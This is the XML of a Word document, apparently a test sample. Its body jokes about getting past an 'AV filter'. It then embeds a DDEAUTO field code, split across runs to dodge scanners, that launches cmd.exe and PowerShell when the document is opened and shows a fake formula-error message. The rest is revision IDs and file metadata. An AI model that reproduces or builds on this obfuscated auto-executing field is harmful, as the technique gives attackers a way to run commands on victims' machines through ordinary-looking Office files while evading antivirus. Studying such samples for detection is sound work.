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E6" w:rsidRDefault="002E7742">
      <w:r>
        <w:t>This is a test!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE4FE6" w:rsidRDefault="00AE4FE6">
      <w:r>
        <w:t>This is another line to see if we can pass the AV filter…hahaha.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD2279" w:rsidRDefault="0086096D">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BF133A" w:rsidRPr="00BF133A">
        <w:instrText>DDEAUTO c:\\windows\\</w:instrText>
      </w:r>
      <w:r w:rsidR="00AE4FE6">
        <w:instrText>system32\\cmd.exe "/k powershell</w:instrText>
      </w:r>
      <w:r w:rsidR="00BF133A">
        <w:instrText>.exe"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00847D93">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BD2279" w:rsidSect="0058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2E7742"/>
    <w:rsid w:val="000572C0"/>
    <w:rsid w:val="00080F30"/>
    <w:rsid w:val="001419C8"/>
    <w:rsid w:val="001742E6"/>
    <w:rsid w:val="00174A23"/>
    <w:rsid w:val="001A21DE"/>
    <w:rsid w:val="001A743D"/>
    <w:rsid w:val="0021141E"/>
    <w:rsid w:val="00261239"/>
    <w:rsid w:val="002E7742"/>
    <w:rsid w:val="00321D1E"/>
    <w:rsid w:val="00366CDB"/>
    <w:rsid w:val="00367FB2"/>
    <w:rsid w:val="00374BD6"/>
    <w:rsid w:val="003931A3"/>
    <w:rsid w:val="0040429C"/>
    <w:rsid w:val="00482168"/>
    <w:rsid w:val="0058025F"/>
    <w:rsid w:val="005A2DB4"/>
    <w:rsid w:val="005F3379"/>
    <w:rsid w:val="006665CF"/>
    <w:rsid w:val="00673528"/>
    <w:rsid w:val="00674B45"/>
    <w:rsid w:val="006C1780"/>
    <w:rsid w:val="006D5547"/>
    <w:rsid w:val="00774F66"/>
    <w:rsid w:val="007E24BF"/>
    <w:rsid w:val="00824ADF"/>
    <w:rsid w:val="00847D93"/>
    <w:rsid w:val="0086096D"/>
    <w:rsid w:val="00993499"/>
    <w:rsid w:val="00A91112"/>
    <w:rsid w:val="00AD4DD5"/>
    <w:rsid w:val="00AE4FE6"/>
    <w:rsid w:val="00B226F8"/>
    <w:rsid w:val="00B77910"/>
    <w:rsid w:val="00BF133A"/>
    <w:rsid w:val="00C87CC9"/>
    <w:rsid w:val="00CA2C21"/>
    <w:rsid w:val="00DC5E14"/>
    <w:rsid w:val="00DE3498"/>
    <w:rsid w:val="00E64D2D"/>
    <w:rsid w:val="00F935CF"/>
    <w:rsid w:val="00FD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>Grizli777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2017-11-12T22:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-13T02:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>